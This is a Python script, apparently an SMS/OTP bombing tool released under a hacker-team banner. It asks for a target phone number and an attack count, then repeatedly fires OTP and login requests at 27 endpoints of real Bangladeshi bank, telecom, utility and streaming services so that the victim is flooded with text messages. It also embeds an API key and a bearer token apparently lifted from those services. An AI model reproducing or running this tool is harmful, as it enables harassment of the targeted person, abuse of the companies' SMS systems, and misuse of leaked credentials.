import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _ _____                         
 (_)_   _|___                     
 | | | ||_  /                     
 | | | | / /                      
 |_| |_|/___|                     
  ____        ____  _ _   _       
 |  _ \ _   _|  _ \(_) \ | | __ _ 
 | |_) | | | | | | | |  \| |/ _` |
 |  __/| |_| | |_| | | |\  | (_| |
 |_|    \__,_|____/|_|_| \_|\__,_|
                                  """+end)


# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")


print ("	 -!-!- WeLcOmE-!-!- (SiiLenT HunTer TeaM ) ")

print ("	 -!-!- WeLcOmE-!-!- ( Mr-PuDiiNA ) ( MrPuDiiNA ) ")




number  = str(input("[>] HeY Mr : PuDiNA Sir. apNar aTTack NumBer DiN: "))


amount = int(input("[>] PuDiiNa Sir apNar aTTack ar PoriMaN LikHuN: "))


url1 = "http://nesco.sslwireless.com:80/api/v1/login"

headers1 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/x-www-form-urlencoded"

data1 = "phone_number="+number


url2 = "http://27.131.15.19/lstyle/api/lsotprequest"

headers2 = CaseInsensitiveDict()

headers2["Content-Length"]="48"

headers2["Content-Type"]="application/json;charset=utf-8"

data2 = """{
  \"shortcode\": \"2494905\",
  \"msisdn\": \"88"""+number+"""\"
}"""





url3 = "https://prodapi.swap.com.bd/api/v1/send-otp/login"

headers3 = CaseInsensitiveDict()

headers3["X-Authorization"]= "QoFN68MGTcosJxSmDf5GCgxXlNcgE1mUH9MUWuDHgs7dugjR7P2ziASzpo3frHL3"

headers3["Content-Type"] = "application/json"

data3 = '{"mobile_number":"'+number+'","referral":false}'

url4 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers4 = CaseInsensitiveDict()

headers4["Content-Type"]="application/json; charset=UTF-8"

data4 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'


url5 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers5 = CaseInsensitiveDict()

headers5["Content-Type"]="application/json; charset=UTF-8"

data5 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'

url6 = "http://nesco.sslwireless.com:80/api/v1/login"

headers6 = CaseInsensitiveDict()
headers6["Content-Type"] = "application/x-www-form-urlencoded"

data6 = "phone_number="+number

url7 = "http://nesco.sslwireless.com:80/api/v1/login"

headers7 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/x-www-form-urlencoded"

data7 = "phone_number="+number


url8 = "http://nesco.sslwireless.com:80/api/v1/login"

headers8 = CaseInsensitiveDict()
headers8["Content-Type"] = "application/x-www-form-urlencoded"

data8 = "phone_number="+number

url9 = "http://nesco.sslwireless.com:80/api/v1/login"

headers9 = CaseInsensitiveDict()
headers9["Content-Type"] = "application/x-www-form-urlencoded"

data9 = "phone_number="+number

url10 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers10 = CaseInsensitiveDict()

headers10["Content-Type"]="application/json; charset=UTF-8"

data10 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'

url11 = "https://ezybank.dhakabank.com.bd/VerifIDExt2/api/CustOnBoarding/VerifyMobileNumber"

headers11 = CaseInsensitiveDict()

headers11["Content-Type"]="application/json; charset=UTF-8"

data11 = '{"AccessToken":"","TrackingNo":"","mobileNo":"'+number+'","otpSms":"","product_id":"250","requestChannel":"MOB","trackingStatus":5}'


url12 = "https://ss.binge.buzz/otp/send/login"

headers12 = CaseInsensitiveDict()
headers12["Content-Type"] = "application/x-www-form-urlencoded"

data12 = "phone="+number


url13 = "https://ss.binge.buzz/otp/send/login"

headers13 = CaseInsensitiveDict()
headers13["Content-Type"] = "application/x-www-form-urlencoded"

data13 = "phone="+number

url14 = "https://ss.binge.buzz/otp/send/login"

headers14 = CaseInsensitiveDict()
headers14["Content-Type"] = "application/x-www-form-urlencoded"

data14 = "phone="+number
url15 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers15 = CaseInsensitiveDict()
headers15["Content-Type"] = "application/json"

headers15["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"


data15 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8183aaf0-77be-4a77-b9d8-f48767a4265f"}'


url16 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers16 = CaseInsensitiveDict()
headers16["Content-Type"] = "application/json"

headers16["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"



data16 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8183aaf0-77be-4a77-b9d8-f48767a4265f"}'

url17 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers17 = CaseInsensitiveDict()
headers17["Content-Type"] = "application/json"


headers17["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"


data17= '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"b373ffb6-1770-4757-ac63-34da247e3deb"}'



url18 =" https://webapi.robi.com.bd/v1/otp/send_request"

headers18 = CaseInsensitiveDict()

headers18["Content-Type"] = "application/json"

headers18["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"



data18 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"dd077167-4c05-4173-b9b0-96ecde75c0c1"}'


url19 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers19 = CaseInsensitiveDict()

headers19["Content-Type"] = "application/json"


headers19["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"



data19 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"30c425a5-cd1d-4359-9a9d-6856bafbe6fa"}'


url20 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers20= CaseInsensitiveDict()

headers20["Content-Type"] = "application/json"


headers20["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"



data20 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"5c5d9662-b432-4e83-9882-077ae14226c6"}'

url21 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers21 = CaseInsensitiveDict()


headers21["Content-Type"] = "application/json"


headers21["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"



data21 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"20b51209-dd23-48e4-b6ad-bb7b1af41021"}'





url22 = "https://webapi.robi.com.bd/v1/otp/send_request"



headers22 = CaseInsensitiveDict()
headers22["Content-Type"] = "application/json"
headers22["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"



data22 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"a7726093-7f8c-4fc9-b747-bd4e839f4af1"}'

url23 = "https://webapi.robi.com.bd/v1/otp/send_request"






headers23 = CaseInsensitiveDict()

headers23["Content-Type"] = "application/json"


headers23["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"






data23 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8d14bb6e-899c-415d-8090-af1a16bce1af"}'



url24 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers24 = CaseInsensitiveDict()


headers24["Content-Type"] = "application/json"

headers24["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"




data24 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"93f73f0d-2974-43e6-9af8-c8325aa8df3d"}'



url25 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers25 = CaseInsensitiveDict()

headers25["Content-Type"] = "application/json"

headers25["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"




data25 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"b57c2854-8b9d-48d8-abbe-03e0caa28c18"}'





url26 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers26 = CaseInsensitiveDict()


headers26["Content-Type"] = "application/json"


headers26["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"



data26 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"9358cd85-e111-4fe9-8e61-c8fb013348e4"}'




url27 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers27 = CaseInsensitiveDict()


headers27["Content-Type"] = "application/json"

headers27["Authorization"] = "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL3dlYmFwaS5yb2JpLmNvbS5iZC92MS90b2tlbiIsImlhdCI6MTY1NDI4MDQ1NywiZXhwIjoxNjU0MzY2ODU3LCJuYmYiOjE2NTQyODA0NTcsImp0aSI6InZGV3ZnRjY3Uk55QkxKVjEiLCJzdWIiOiJSb2JpV2ViU2l0ZSJ9.5zA220X7nI42R77FqLSeqBBy91Wxz5FhvLUsMTfOL-4"




data27 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"20b7088f-408a-4c0a-914b-6421a8fa5feb"}'















































































































































































































































for i in range(amount):
	try:
		resp1 = requests.post(url1, headers=headers1, data=data1)

		
		resp2 = requests.post(url2, headers=headers2, data=data2)				
								
	
		
		resp3 = requests.post(url3, headers=headers3, data=data3)
		
		resp4 = requests.post(url4, headers=headers4, data=data4)

		resp5 = requests.post(url5, headers=headers5, data=data5)
		
		resp6 = requests.post(url6, headers=headers5, data=data6)
		
		resp7 = requests.post(url7, headers=headers7, data=data7)
		
		resp8 = requests.post(url8, headers=headers8, data=data8)
		
		resp9 = requests.post(url9, headers=headers9, data=data9)
		
		resp10 = requests.post(url10, headers=headers10, data=data10)
		
		resp11 = requests.post(url11, headers=headers11, data=data11)
		
		resp12 = requests.post(url12, headers=headers12, data=data12)
		
		resp13 = requests.post(url13, headers=headers13, data=data13)
		
		resp14 = requests.post(url14, headers=headers14, data=data14)
		
		resp15 = requests.post(url15, headers=headers15, data=data15)
		resp16 = requests.post(url16, headers=headers16, data=data16)


		resp17 = requests.post(url17, headers=headers17, data=data17)



		resp18 = requests.post(url18, headers=headers18, data=data18)



		resp19 = requests.post(url19, headers=headers19, data=data19)





		resp20 = requests.post(url20, headers=headers20, data=data20)




		resp21 = requests.post(url21, headers=headers21, data=data21)




		resp22 = requests.post(url22, headers=headers22, data=data22)






		resp23 = requests.post(url23, headers=headers23, data=data23)





		resp24 = requests.post(url24, headers=headers24, data=data24)





		resp25 = requests.post(url25, headers=headers25, data=data25)




		resp26 = requests.post(url26, headers=headers26, data=data26)



		resp27 = requests.post(url27, headers=headers27, data=data27)

		print(str (i+1)+"  PuDiiNa SiiR PiiN SeNT HoYeChE \n")
	except:
		print ("Please Make Sure Your Internet Connection")